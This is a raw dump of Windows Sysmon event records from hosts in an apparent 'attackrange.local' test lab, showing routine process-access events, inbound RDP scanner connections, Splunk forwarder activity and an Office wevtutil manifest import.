14:55:56.016{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.016{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.001{A7A01FEF-EB7B-607E-8B0B-00000000BB01}29526536C:\Windows\system32\conhost.exe{A7A01FEF-EB7B-607E-8A0B-00000000BB01}3212C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.985{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-8B0B-00000000BB01}2952C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 354300x800000000000000049881Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:54.197{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55641-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049880Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:53.956{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54096-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049879Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:53.755{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63153-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049878Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.449{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE3F2A86B18B9EC505BCF870A617FED,SHA256=2FF5C2FCB03AA84117AC6C0AE18535A14AB24298DB5B42407897334FFA8FED1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049877Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB7C-607E-DD06-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049876Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049875Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049874Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049873Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049872Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049871Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049870Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049869Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049868Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049867Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EB7C-607E-DD06-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049866Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.090{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB7C-607E-DD06-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049865Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.091{85C0FFC9-EB7C-607E-DD06-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049864Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:56.074{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D76B0045D5883A035DF52B6ED457275,SHA256=3BF95672ACEDABFDAAB1CF9773144E27A4F4D1FDD7B6BCF2FCF5F9D642DE013D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000072290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.954{A7A01FEF-EB7D-607E-9B0B-00000000BB01}13646220C:\Windows\system32\conhost.exe{A7A01FEF-EB7D-607E-9A0B-00000000BB01}6244C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-9B0B-00000000BB01}1364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-9A0B-00000000BB01}6244C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165340C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7D-607E-9A0B-00000000BB01}6244C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2f9c6d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2efed5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.945{A7A01FEF-EB7D-607E-9A0B-00000000BB01}6244C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe im "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man" /rf:"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\mso.dll" /mf:"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\mso.dll"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 23542300x800000000000000072281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.938{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.manMD5=696F2B52D9A66D646A0D741419E96250,SHA256=06CD20E1AD0F7B3681BF98673C38254DF610B46E21556A76250A434637D29BEF,IMPHASH=00000000000000000000000000000000falsefalse - rename failed with status 0xc0000022 13241300x800000000000000072280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.829{A7A01FEF-EB7D-607E-980B-00000000BB01}6988C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\TypeDWORD (0x00000003) 